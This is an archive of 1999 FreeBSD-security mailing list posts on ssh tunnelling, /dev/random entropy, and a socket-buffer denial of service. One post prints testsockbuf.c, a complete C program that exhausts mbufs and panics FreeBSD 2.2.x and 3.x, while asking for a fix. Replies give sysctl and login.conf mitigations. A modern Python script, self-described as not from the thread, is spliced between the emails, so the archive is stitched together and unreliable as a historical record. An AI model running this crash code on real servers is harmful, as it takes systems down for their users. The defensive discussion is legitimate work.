From owner-freebsd-security Sun Aug 15 19:59:26 1999
Delivered-To: freebsd-security@freebsd.org
Received: from sludge.pgh.pa.us (sludge.pgh.pa.us [206.210.78.220]) by hub.freebsd.org (Postfix) with ESMTP id 1C0D3153CE for ; Sun, 15 Aug 1999 19:59:14 -0700 (PDT) (envelope-from durham@sludge.pgh.pa.us)
Received: (from durham@localhost) by sludge.pgh.pa.us (8.8.8/8.8.8) id WAA21810; Sun, 15 Aug 1999 22:58:21 -0400 (EDT) (envelope-from durham)
Date: Sun, 15 Aug 1999 22:58:21 -0400 (EDT)
From: "James C. Durham"
Message-Id: <199908160258.WAA21810@sludge.pgh.pa.us>
To: barrett@pheonix.aye.net, freebsd-security@freebsd.org, nick@rapidnet.com
Subject: Re: ssh dropping connections/sendmail IP
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Barrett Richardson wrote:
>
> On Wed, 11 Aug 1999, James C. Durham wrote:
>
> > I am using ssh to tunnel from my "remote server" located
> > at a remote location with a public IP number to my "local
> > server" behind an ISP's firewall using a DSL connection.
> >
> > The ssh connection keeps dropping out. I have KeepAlive "YES" and
> > IdleTime set to 104w (2 years). I have just started having a little
> > script on the remote machine send me the date/time every 30 seconds
> > and that seems to keep it up. Is this behavior normal?
> >
>
> The frequency of the keepalives isn't sufficient traffic to keep
> the firewall from snipping the connection. It doesn't consider
> the connection active if traffic drops below a threshold.
>
> > Also, I'm having problems sending mail from sendmail on my local
> > machine because the IP gets translated to something that doesn't
> > resolve at the ISP's firewall. This means I can't send to
> > some sites (freebsd-security being one of them!). I've been trying
> > to see a way that I can relay the sendmail feed through my remote server
> > using port redirection. I can't run the sendmail daemon on the remote
> > server because port 25 is already bound to ssh.
>
> The remote server is the one outside the firewall, right? Any
> reason you can't run sshd on the de facto port 22?
>

I'm sorry for the late reply..bad weekend! However, sshd is running on 22,
but 25 and 80 are being relayed by sshd2 and are already bound.

Nick Rogness wrote:
>
> On Wed, 11 Aug 1999, James C. Durham wrote:
>
> > Also, I'm having problems sending mail from sendmail on my local
> > machine because the IP gets translated to something that doesn't
> > resolve at the ISP's firewall. This means I can't send to
>
> I'm assuming that sendmail responds with a 451 error:
> ...sender domain must resolve...
>
> Sendmail has the capability to do this. You just have to build a
> sendmail cf file to relay/masquerade your mail off of another
> server that has an actual reverse lookup.
>
> *******************************************************************
> Nick Rogness                  Shaw's Principle:
> System Administrator          Build a system that even a fool
> RapidNet, INC                 can use, and only a fool will
> nick@rapidnet.com             want to use it.
> *******************************************************************

Yes, what I'd like to do is relay through my remote server, but I can't
run sendmail there on port 25 because it's already bound by ssh. Moving
one of the sendmails to another port looks like it means some source
modifications, as it appears to pick up both the listen and send port
numbers from /etc/services.
Anyway, thanks for the replies

-Jim Durham

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Aug 16 1:24:22 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ida.interface-business.de (ida.interface-business.de [193.101.57.203]) by hub.freebsd.org (Postfix) with ESMTP id DB3A914F54; Mon, 16 Aug 1999 01:24:03 -0700 (PDT) (envelope-from j@ida.interface-business.de)
Received: (from j@localhost) by ida.interface-business.de id KAA21234; Mon, 16 Aug 1999 10:23:46 +0200 (MET DST)
Date: Mon, 16 Aug 1999 10:23:46 +0200
From: J Wunsch
To: core@freebsd.org, security@freebsd.org
Subject: [roessler@guug.de: /dev/random unter FreeBSD]
Message-ID: <19990816102346.F21120@ida.interface-business.de>
Reply-To: Joerg Wunsch
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.6i
X-Phone: +49-351-31809-14
X-PGP-Fingerprint: DC 47 E6 E4 FF A6 E9 8F 93 21 E0 7D F9 12 D6 4E
Organization: interface business GmbH, Dresden
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Thomas Roessler forwarded me the following. Since entropy theories and
the implementation details of our /dev/random are beyond my field of
knowledge and interest, I'm forwarding this to whomever it may concern.

----- Forwarded message from "Theodore Y. Ts'o" -----

Date: Sat, 14 Aug 1999 23:41:03 -0400
From: "Theodore Y. Ts'o"
To: David Honig
Cc: "Arnold G. Reinhold" , "Theodore Y. Ts'o" , cryptography@c2.net, linux-ipsec@clinet.fi, Bill Stewart
Subject: Re: Summary re: /dev/random
Address: 1 Amherst St., Cambridge, MA 02139
Phone: (617) 253-8091

   Date: Fri, 13 Aug 1999 13:55:29 -0700
   From: David Honig

   I have posted about using Maurer's Universal Statistical Test to
   measure entropy. With this tool you can see the effect of various
   conditioning [see RFC 1750] algorithms.
   (Of course, if your conditioning is a secure hash, the entropy
   measure is pinned at maximum). This would provide a better
   estimation function IMO than the current estimation function,
   which I consider too generous. With all due respect, Theo.

I should point out that the FreeBSD /dev/random driver is an extremely
hacked-up, ancient version of my driver. The FreeBSD folks have made all
sorts of changes to it, and while I recognize some of the code as being
mine, they have made enough changes to it that it really isn't fair to
judge it as being my driver.

If you examine the latest /dev/random sources in Linux, you will find
that it is much, much more conservative about the entropy estimation
than the hacked-up 0.95 /dev/random driver found in FreeBSD (the last
modified by me in October, 1995 should be a hint that it's not recent).
I'm willing to believe that there are still things which can be
criticized in the current entropy estimation algorithm, but please use
something more recent than FreeBSD's /dev/random driver as the basis for
your criticism!

I looked at your paper, but it is far too technical for me to evaluate
without a large amount of meditation, and probably not without tracking
down all of the relevant references. (With all due respect, it's
written in the standard Mathematician's style --- encrypted by formulae
guaranteed to make it opaque to all but those who are trained in the
peculiar style of Mathematics' papers. I'm not a mathematician, so it
would take far more time than I have right now to decrypt it. I have
printed it out and will try to puzzle it out later when I have time.)

If I remember correctly, last time someone tried to persuade me to use
Maurer's test (when it was explained to me in Layman's English --- hi
Colin!), my problem with it was that it was too memory intensive and too
CPU intensive to use in the kernel.
I'm quite willing to be proven wrong, if someone wants to try to explain
to me Maurer's test and how to do it in English, and then try to
persuade me that it's actually feasible to do it in the kernel. Better
yet, send me C source code.... I'll be happy to consider it.

						- Ted

----- End forwarded message -----

--
Jörg Wunsch                                       Unix support engineer
joerg_wunsch@interface-business.de       http://www.interface-business.de/~j

From owner-freebsd-security Mon Aug 16 15:55:24 1999
Delivered-To: freebsd-security@freebsd.org
Received: by hub.freebsd.org (Postfix, from userid 758) id 4D08C15577; Mon, 16 Aug 1999 15:55:23 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 3FE121CD898; Mon, 16 Aug 1999 15:55:23 -0700 (PDT) (envelope-from kris@hub.freebsd.org)
Date: Mon, 16 Aug 1999 15:55:23 -0700 (PDT)
From: Kris Kennaway
To: Joerg Wunsch
Cc: security@freebsd.org
Subject: Re: [roessler@guug.de: /dev/random unter FreeBSD]
In-Reply-To: <19990816102346.F21120@ida.interface-business.de>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 16 Aug 1999, J Wunsch wrote:

> Thomas Roessler forwarded me the following. Since
> entropy theories and the implementation details of our /dev/random
> are beyond my field of knowledge and interest, I'm forwarding this to
> whomever it may concern.

Syncing our /dev/random code with the more recent version in Linux is
something I'd like to see happen as well.
Kris

From owner-freebsd-security Mon Aug 16 16:37:23 1999
Delivered-To: freebsd-security@freebsd.org
Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id E57AD155AF; Mon, 16 Aug 1999 16:37:20 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id QAA72742; Mon, 16 Aug 1999 16:36:47 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
To: Kris Kennaway
Cc: Joerg Wunsch , security@FreeBSD.ORG
Subject: Re: [roessler@guug.de: /dev/random unter FreeBSD]
In-reply-to: Your message of "Mon, 16 Aug 1999 15:55:23 PDT."
Date: Mon, 16 Aug 1999 16:36:47 -0700
Message-ID: <72739.934846607@localhost>
From: "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

That's great, but who's going to do the work? :)

> On Mon, 16 Aug 1999, J Wunsch wrote:
>
> > Thomas Roessler forwarded me the following. Since
> > entropy theories and the implementation details of our /dev/random
> > are beyond my field of knowledge and interest, I'm forwarding this to
> > whomever it may concern.
>
> Syncing our /dev/random code with the more recent version in Linux is
> something I'd like to see happen as well.
>
> Kris
>

From owner-freebsd-security Mon Aug 16 17:27:21 1999
Delivered-To: freebsd-security@freebsd.org
Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id C4E2A14BF8 for ; Mon, 16 Aug 1999 17:27:17 -0700 (PDT) (envelope-from mike@sentex.net)
Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id UAA13737 for ; Mon, 16 Aug 1999 20:27:29 -0400 (EDT)
Message-Id: <4.1.19990816203409.05989960@granite.sentex.ca>
X-Sender: mdtancsa@granite.sentex.ca
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Mon, 16 Aug 1999 20:40:29 -0400
To: freebsd-security@freebsd.org
From: Mike Tancsa
Subject: Any work around for this FreeBSD bug/DoS ?
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Is there any work around or coming fix for the 'testsockbuf.c' originally
reported by Marc Olzheim on Aug 9th ? It's only a matter
of time until some wannabe script kiddie uploads it to one of my servers
for his/her cgi-script. It crashes 2.2.x and 3.x servers reliably :-( I
sent a message to the security officer last week but haven't heard anything
since then.
---Mike

#include
#include
#include

#define BUFFERSIZE 204800

extern int main(void)
{
	int p[2], i;
	char crap[BUFFERSIZE];

	while (1) {
		if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
			break;
		i = BUFFERSIZE;
		setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
		setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
		setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
		setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
		fcntl(p[0], F_SETFL, O_NONBLOCK);
		fcntl(p[1], F_SETFL, O_NONBLOCK);
		write(p[0], crap, BUFFERSIZE);
		write(p[1], crap, BUFFERSIZE);
	}
	return(0);
}

---Mike

**********************************************************************
Mike Tancsa, Network Admin          *       mike@sentex.net
Sentex Communications Corp,         *       http://www.sentex.net/mike
Cambridge, Ontario                  *       01.519.651.3400
Canada                              *

From owner-freebsd-security Mon Aug 16 18:21:11 1999
Delivered-To: freebsd-security@freebsd.org
Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 2096C1546F for ; Mon, 16 Aug 1999 18:21:09 -0700 (PDT) (envelope-from dillon@apollo.backplane.com)
Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id SAA12524; Mon, 16 Aug 1999 18:19:46 -0700 (PDT) (envelope-from dillon)
Date: Mon, 16 Aug 1999 18:19:46 -0700 (PDT)
From: Matthew Dillon
Message-Id: <199908170119.SAA12524@apollo.backplane.com>
To: Mike Tancsa
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Any work around for this FreeBSD bug/DoS ?
References: <4.1.19990816203409.05989960@granite.sentex.ca>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

:Is there any work around or coming fix for the 'testsockbuf.c' originally
:reported by Marc Olzheim on Aug 9th ? It's only a matter
:of time until some wannabe script kiddie uploads it to one of my servers
:for his/her cgi-script.
:It crashes 2.2.x and 3.x servers reliably :-( I
:sent a message to the security officer last week but haven't heard anything
:since then.
:
: ---Mike

    Try adjusting the kern.ipc.maxsockbuf sysctl.

					-Matt

From owner-freebsd-security Mon Aug 16 18:25:10 1999
Delivered-To: freebsd-security@freebsd.org
Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 1683C1546F for ; Mon, 16 Aug 1999 18:25:07 -0700 (PDT) (envelope-from mike@sentex.net)
Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id VAA25174; Mon, 16 Aug 1999 21:24:31 -0400 (EDT)
Message-Id: <4.1.19990816213403.05a3b540@granite.sentex.ca>
X-Sender: mdtancsa@granite.sentex.ca
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Mon, 16 Aug 1999 21:37:32 -0400
To: Matthew Dillon
From: Mike Tancsa
Subject: Re: Any work around for this FreeBSD bug/DoS ?
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <199908170119.SAA12524@apollo.backplane.com>
References: <4.1.19990816203409.05989960@granite.sentex.ca>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Try adjusting the kern.ipc.maxsockbuf sysctl.

Thanks for the quick response Matt. But to what value, and what are the
implications / trade offs ? Sorry, was this discussed before somewhere ? I
didn't see any followup in stable where I originally saw it posted. Doing a
search in Dejanews through the mailing lists, I only see three old
references to this particular param from 6 months ago.
---Mike

**********************************************************************
Mike Tancsa, Network Admin          *       mike@sentex.net
Sentex Communications Corp,         *       http://www.sentex.net/mike
Cambridge, Ontario                  *       01.519.651.3400
Canada                              *

From owner-freebsd-security Mon Aug 16 18:27:53 1999
Delivered-To: freebsd-security@freebsd.org
Received: by hub.freebsd.org (Postfix, from userid 758) id 9DA51157C6; Mon, 16 Aug 1999 18:27:51 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 562051CD892; Mon, 16 Aug 1999 18:27:51 -0700 (PDT) (envelope-from kris@hub.freebsd.org)
Date: Mon, 16 Aug 1999 18:27:50 -0700 (PDT)
From: Kris Kennaway
To: "Jordan K. Hubbard"
Cc: Joerg Wunsch , security@FreeBSD.ORG
Subject: Re: [roessler@guug.de: /dev/random unter FreeBSD]
In-Reply-To: <72739.934846607@localhost>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 16 Aug 1999, Jordan K. Hubbard wrote:

> That's great, but who's going to do the work? :)

Mark Murray and I have both expressed interest in the RNG stuff. I'm not
committing to the project immediately because 1) I don't have a computer
(or for that matter a place to live :) right now and 2) my higher
priority is the libcrypt/SRP stuff. But if no-one else takes it up, I'm
planning to take a look in a month or three.
Kris

From owner-freebsd-security Mon Aug 16 22:28:54 1999
Delivered-To: freebsd-security@freebsd.org
Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id A733214C15 for ; Mon, 16 Aug 1999 22:28:48 -0700 (PDT) (envelope-from dillon@apollo.backplane.com)
Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id WAA13380; Mon, 16 Aug 1999 22:27:09 -0700 (PDT) (envelope-from dillon)
Date: Mon, 16 Aug 1999 22:27:09 -0700 (PDT)
From: Matthew Dillon
Message-Id: <199908170527.WAA13380@apollo.backplane.com>
To: Mike Tancsa
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Any work around for this FreeBSD bug/DoS ?
References: <4.1.19990816203409.05989960@granite.sentex.ca> <4.1.19990816213403.05a3b540@granite.sentex.ca>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

:Thanks for the quick response Matt. But to what value, and what are the
:implications / trade offs ? Sorry, was this discussed before somewhere ? I
:didn't see any followup in stable where I originally saw it posted. Doing a
:search in Dejanews through the mailing lists, I only see three old
:references to this particular param from 6 months ago.
:
: ---Mike

    Well, the problem you are trying to avoid is allowing the user to
    over-allocate network mbufs for sockets. It will be a combination of
    the maximum buffer size allowed for sockets x 2 ( there are separate
    read and write buffers ) and the maximum number of descriptors the user
    can allocate. In addition to that sysctl you need to look at the
    'maxproc' and 'descriptors' resource limits in /etc/login.conf, which
    can be set differently depending on the user id or user class (a field
    in the password file, see 'man 5 passwd').
    So, for example, if you limit normal users to 30 processes and 40
    file descriptors per process you wind up with a maximum of 1200 open
    descriptors. If you limit the socket buffer to 16384, that's 32K
    per descriptor and around 38MB of ram. The system would have to be
    configured with a sufficient number of network mbufs such that a single
    user allocating 38MB of ram does not run the system out. It is possible
    to adjust the number of mbuf clusters in the kernel config using the
    NMBCLUSTERS options (see /usr/src/sys/i386/conf/LINT). I think each
    cluster represents either 8K or 16K. I forget.

    There are many ways a user can crash the system... eating network mbufs
    isn't the easiest. My experience is that as long as you cover most of
    the bases, the few that remain will not cause enough of a problem to
    become endemic. Crashing a machine through a user account is not
    really satisfactory to most hackers since it is so easy to do -- and
    also relatively easy to trace.

					-Matt
					Matthew Dillon

From owner-freebsd-security Tue Aug 17 0:15:33 1999
Delivered-To: freebsd-security@freebsd.org
Received: from tversu.ru (mail.tversu.ru [62.76.80.2]) by hub.freebsd.org (Postfix) with ESMTP id 3ED3314DFB for ; Tue, 17 Aug 1999 00:12:48 -0700 (PDT) (envelope-from vadim@tversu.ru)
Received: from gala.tversu.ru (postfix@gala.tversu.ru [62.76.80.10]) by tversu.ru (8.8.8/8.8.8) with ESMTP id LAA19960; Tue, 17 Aug 1999 11:11:39 +0400 (MSD)
Received: by gala.tversu.ru (Postfix, from userid 100) id C3719701B; Tue, 17 Aug 1999 11:11:30 +0400 (MSD)
Date: Tue, 17 Aug 1999 11:11:30 +0400
From: Vadim Kolontsov
To: Matthew Dillon
Cc: Mike Tancsa , freebsd-security@FreeBSD.ORG
Subject: Re: Any work around for this FreeBSD bug/DoS ?
Message-ID: <19990817111130.A8127@tversu.ru>
References: <4.1.19990816203409.05989960@granite.sentex.ca> <4.1.19990816213403.05a3b540@granite.sentex.ca> <199908170527.WAA13380@apollo.backplane.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.6i
In-Reply-To: <199908170527.WAA13380@apollo.backplane.com>; from Matthew Dillon on Mon, Aug 16, 1999 at 10:27:09PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, Aug 16, 1999 at 10:27:09PM -0700, Matthew Dillon wrote:
>
> So, for example, if you limit normal users to 30 processes and 40
> file descriptors per process you wind up with a maximum of 1200 open
> descriptors. If you limit the socket buffer to 16384, that's 32K
> per descriptor and around 38MB of ram. The system would have to be
> configured with a sufficient number of network mbufs such that a single
> user allocating 38MB of ram does not run the system out.

I've read that "once memory is allocated for mbufs clusters, it is never
freed". So after user program exits/dies, 38MB list of free mbufs remains;
will it have any [network code] performance consequences? will those mbufs
just be paged out? sorry if the question doesn't make sense :)

V.
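The arithmetic Matthew Dillon gives earlier in this thread (processes x descriptors per process x two socket buffers x largest buffer size) is easy to get wrong when the limits live in a login.conf class with separate -cur and -max entries. The script below is an added example, not code from anyone in the thread: it parses a termcap-style login.conf record, picks the hard limit of each resource (a user can raise a soft limit up to the hard one), and reports whether one user of that class could pin down the whole mbuf cluster pool. The sample class is constructed after the 'dialu' class quoted later in the thread; the kern.ipc.maxsockbuf value, the NMBCLUSTERS figure and the 2048-byte cluster size are assumptions to be replaced with the running kernel's values.

```python
"""Worst-case socket-buffer memory one login class can pin in mbuf clusters.

Added example (not from the thread).  Applies Matthew Dillon's arithmetic,
  processes x descriptors x 2 buffers (send + receive) x buffer size,
to a login.conf(5) class and compares the result against the cluster pool.
"""
import math

# Constructed sample, modelled on the 'dialu' class quoted in this thread.
SAMPLE_LOGIN_CONF = """\
# constructed sample login.conf
default:\\
    :maxproc=unlimited:\\
    :openfiles=unlimited:

dialu:\\
    :copyright=/etc/COPYRIGHT:\\
    :welcome=/etc/motd:\\
    :setenv=MAIL=/var/mail/$,BLOCKSIZE=K:\\
    :path=~/bin /bin /usr/bin /usr/local/bin /usr/X11R6/bin:\\
    :nologin=/var/run/nologin:\\
    :cputime=unlimited:\\
    :datasize=unlimited:\\
    :memorylocked-cur=10M:\\
    :memoryuse-max=30M:\\
    :maxproc-cur=9:\\
    :maxproc-max=15:\\
    :openfiles-max=16:\\
    :priority=0:\\
    :ignoretime@:\\
    :umask=022:
"""

_SIZE_SUFFIX = {"b": 1, "k": 1024, "m": 1024 ** 2, "g": 1024 ** 3, "t": 1024 ** 4}


def parse_size(value):
    """login.conf size or count ('10M', '15', 'unlimited') -> int, None if unlimited."""
    v = value.strip().lower()
    if v in ("unlimited", "infinity"):
        return None
    if v and v[-1] in _SIZE_SUFFIX:
        return int(v[:-1]) * _SIZE_SUFFIX[v[-1]]
    return int(v)


def parse_login_conf(text):
    """Parse termcap-style records into {class_name: {capability: value}}."""
    classes, record = {}, ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):            # continuation line: keep accumulating
            record += line[:-1].strip()
            continue
        record += line
        if record and not record.startswith("#"):
            fields = [f for f in record.split(":") if f]
            caps = {}
            for field in fields[1:]:
                key, _, val = field.partition("=")   # 'ignoretime@' keeps val == ""
                caps[key] = val
            for name in fields[0].split("|"):        # 'name|alias' heads a record
                classes[name] = caps
        record = ""
    return classes


def hard_limit(caps, base):
    """Binding limit for a resource: -max first, then plain, then -cur.

    A user may raise the soft (-cur) limit up to the hard (-max) one, so the
    hard limit is the worst case.  None means the class leaves it unlimited.
    """
    for key in (base + "-max", base, base + "-cur"):
        if key in caps:
            return parse_size(caps[key])
    return None


def worst_case_sockbuf_bytes(maxproc, openfiles, maxsockbuf):
    """Dillon's figure: processes x descriptors x 2 buffers x largest buffer."""
    return maxproc * openfiles * 2 * maxsockbuf


def class_worst_case(caps, maxsockbuf):
    procs, files = hard_limit(caps, "maxproc"), hard_limit(caps, "openfiles")
    if procs is None or files is None:
        return None                        # nothing in the class bounds it
    return worst_case_sockbuf_bytes(procs, files, maxsockbuf)


def clusters_needed(nbytes, cluster_bytes=2048):
    """mbuf clusters covering nbytes; 2048 is an assumed MCLBYTES, not measured."""
    return math.ceil(nbytes / cluster_bytes)


def assess(text, class_name, maxsockbuf, nmbclusters, cluster_bytes=2048):
    """Return the worst case for one class and whether it exhausts the pool."""
    caps = parse_login_conf(text)[class_name]
    nbytes = class_worst_case(caps, maxsockbuf)
    if nbytes is None:
        return {"class": class_name, "bytes": None, "clusters": None, "exhausts_pool": True}
    clusters = clusters_needed(nbytes, cluster_bytes)
    return {"class": class_name, "bytes": nbytes, "clusters": clusters,
            "exhausts_pool": clusters >= nmbclusters}


if __name__ == "__main__":
    # Assumed tunables for illustration: a 256 KiB kern.ipc.maxsockbuf and a
    # 4096-cluster pool; substitute the values from sysctl and the kernel config.
    for cls in ("dialu", "default"):
        print(assess(SAMPLE_LOGIN_CONF, cls, maxsockbuf=262144, nmbclusters=4096))
```

With Dillon's own numbers (30 processes, 40 descriptors, 16384-byte buffers) the function returns 39,321,600 bytes, his "around 38MB"; the sample 'dialu' class with a 256 KiB maxsockbuf comes to 120 MiB, which is why the thread finds that raising openfiles from 16 to 32 is enough to run the pool dry.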
From owner-freebsd-security Tue Aug 17 3:00:11 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.133]) by hub.freebsd.org (Postfix) with ESMTP id 391DD14F32; Tue, 17 Aug 1999 03:00:02 -0700 (PDT) (envelope-from mark@grondar.za)
Received: from grondar.za (localhost [127.0.0.1]) by gratis.grondar.za (8.9.3/8.9.3) with ESMTP id MAA39422; Tue, 17 Aug 1999 12:00:23 +0200 (SAST) (envelope-from mark@grondar.za)
Message-Id: <199908171000.MAA39422@gratis.grondar.za>
To: Kris Kennaway
Cc: Joerg Wunsch , security@FreeBSD.ORG
Subject: Re: [roessler@guug.de: /dev/random unter FreeBSD]
Date: Tue, 17 Aug 1999 12:00:22 +0200
From: Mark Murray
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> On Mon, 16 Aug 1999, J Wunsch wrote:
>
> > Thomas Roessler forwarded me the following. Since
> > entropy theories and the implementation details of our /dev/random
> > are beyond my field of knowledge and interest, I'm forwarding this to
> > whomever it may concern.
>
> Syncing our /dev/random code with the more recent version in Linux is
> something I'd like to see happen as well.

I am (slowly) working on an implementation of Bruce Schneier's Yarrow.
This is a major improvement.
M
--
Mark Murray
Join the anti-SPAM movement: http://www.cauce.org

From owner-freebsd-security Tue Aug 17 10:21:15 1999
Delivered-To: freebsd-security@freebsd.org
Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 2C98214F32 for ; Tue, 17 Aug 1999 10:21:10 -0700 (PDT) (envelope-from mike@sentex.net)
Received: from simoeon (simeon.sentex.ca [209.112.4.47]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id NAA27019; Tue, 17 Aug 1999 13:18:48 -0400 (EDT)
Message-Id: <3.0.5.32.19990817131742.02a5f6c0@staff.sentex.ca>
X-Sender: mdtpop@staff.sentex.ca
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32)
Date: Tue, 17 Aug 1999 13:17:42 -0400
To: Matthew Dillon
From: Mike Tancsa
Subject: Re: Any work around for this FreeBSD bug/DoS ?
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <199908170527.WAA13380@apollo.backplane.com>
References: <4.1.19990816203409.05989960@granite.sentex.ca> <4.1.19990816213403.05a3b540@granite.sentex.ca>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 10:27 PM 8/16/99 -0700, Matthew Dillon wrote:
>:Thanks for the quick response Matt. But to what value, and what are the
>:implications / trade offs ? Sorry, was this discussed before somewhere ? I
>:didn't see any followup in stable where I originally saw it posted. Doing a
>:search in Dejanews through the mailing lists, I only see three old
>:references to this particular param from 6 months ago.
>:
>: ---Mike
>
> Well, the problem you are trying to avoid is allowing the user to
> over-allocate network mbufs for sockets. It will be a combination of
> the maximum buffer size allowed for sockets x 2 ( there are separate
> read and write buffers ) and the maximum number of descriptors the user
> can allocate.
> In addition to that sysctl you need to look at the
> 'maxproc' and 'descriptors' resource limits in /etc/login.conf, which
> can be set differently depending on the user id or user class (a field
> in the password file, see 'man 5 passwd').
>
> So, for example, if you limit normal users to 30 processes and 40
> file descriptors per process you wind up with a maximum of 1200 open
> descriptors. If you limit the socket buffer to 16384, that's 32K
> per descriptor and around 38MB of ram. The system would have to be
> configured with a sufficient number of network mbufs such that a single
> user allocating 38MB of ram does not run the system out. It is possible
> to adjust the number of mbuf clusters in the kernel config using the
> NMBCLUSTERS options (see /usr/src/sys/i386/conf/LINT). I think each
> cluster represents either 8K or 16K. I forget.

Thanks for the extended info. What I am surprised at is that even with
MAXUSERS set to 128, I have to use something as restrictive as

dialu:\
	:copyright=/etc/COPYRIGHT:\
	:welcome=/etc/motd:\
	:setenv=MAIL=/var/mail/$,BLOCKSIZE=K:\
	:path=~/bin /bin /usr/bin /usr/local/bin /usr/X11R6/bin:\
	:nologin=/var/run/nologin:\
	:cputime=unlimited:\
	:datasize=unlimited:\
	:stacksize=unlimited:\
	:memorylocked-cur=10M:\
	:memoryuse-max=30M:\
	:maxproc-cur=9:\
	:maxproc-max=15:\
	:openfiles-max=16:\
	:filesize=unlimited:\
	:coredumpsize=unlimited:\
	:priority=0:\
	:ignoretime@:\
	:umask=022:

It seems anything above 16 files open (e.g. 32), and they are able to panic
the system.

>
> There are many ways a user can crash the system... eating network mbufs
> isn't the easiest. My experience is that as long as you cover most of
> the bases, the few that remain will not cause enough of a problem to
> become endemic. Crashing a machine through a user account is not
> really satisfactory to most hackers since it is so easy to do -- and
> also relatively easy to trace.

Well, hackers are one thing, but script kiddies are another.
They like to try these sorts of things :-( Sort of 'pissing in the global
village well' as my friend says... No real point to it, they just like to
cause damage :-(

---Mike

------------------------------------------------------------------------
Mike Tancsa,                    tel 01.519.651.3400
Network Administrator,          mike@sentex.net
Sentex Communications           www.sentex.net
Cambridge, Ontario Canada

From owner-freebsd-security Tue Aug 17 10:35:49 1999
Delivered-To: freebsd-security@freebsd.org
Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 10D4D14EBB for ; Tue, 17 Aug 1999 10:35:46 -0700 (PDT) (envelope-from dillon@apollo.backplane.com)
Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id KAA18291; Tue, 17 Aug 1999 10:36:16 -0700 (PDT) (envelope-from dillon)
Date: Tue, 17 Aug 1999 10:36:16 -0700 (PDT)
From: Matthew Dillon
Message-Id: <199908171736.KAA18291@apollo.backplane.com>
To: Mike Tancsa
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Any work around for this FreeBSD bug/DoS ?
References: <4.1.19990816203409.05989960@granite.sentex.ca> <4.1.19990816213403.05a3b540@granite.sentex.ca> <3.0.5.32.19990817131742.02a5f6c0@staff.sentex.ca>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

:
:Thanks for the extended info.
